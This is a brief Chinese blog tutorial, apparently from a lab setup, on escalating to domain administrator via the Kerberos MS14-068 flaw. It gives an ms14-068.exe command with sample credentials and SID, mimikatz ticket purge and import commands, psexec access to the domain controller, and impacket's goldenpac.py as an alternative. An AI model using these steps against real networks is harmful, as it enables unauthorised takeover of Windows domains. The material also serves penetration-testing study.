zoukankan
html css js c++ java
MS14-068提权和impacket工具包提权
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
查看全文
相关阅读:
入门OJ 4187【周末舞会】
入门OJ 1532【排队取款】
洛谷 P3029 [USACO11NOV]【牛的阵容Cow Lineup】
洛谷 P1638【逛画展】
入门OJ 1256【排队】
PKU 1945【Power Hungry Cows】
RocketMQ重试机制和消息
Java操作RocketMQ
RocketMQ概述
重定向机制
原文地址:https://www.cnblogs.com/sup3rman/p/12329854.html
最新文章
洛谷 题解 P4955 【[USACO14JAN]Cross Country Skiing 越野滑雪】
洛谷 题解 UVA1626 【括号序列 Brackets sequence】
基于Python的ModbusTCP客户端实现
基于Python的ModbusTCP客户端实现
说说 Python 的变量以及简单数据类型
Python进阶量化交易场外篇4——寻找最优化策略参数
基于Python+Django的Kubernetes集群管理平台
Python进阶量化交易场外篇3——最大回撤评价策略风险
前后端同学必会的Linux基础命令
走心整理——十个常用深度学习算法
热门文章
【机器学习】Apriori算法——原理及代码实现(Python版)
Python中collections模块的使用
HDU 1548【奇怪的电梯】
入门OJ 1276【迷宫搜索】
洛谷 P1451【细胞】
洛谷 P1535【游荡的奶牛】
usaco2013 mar【懒惰的奶牛】
入门OJ 1531【士兵训练】
入门OJ 1126【丑数】
洛谷 P1037【产生数】
Copyright © 2011-2022 走看看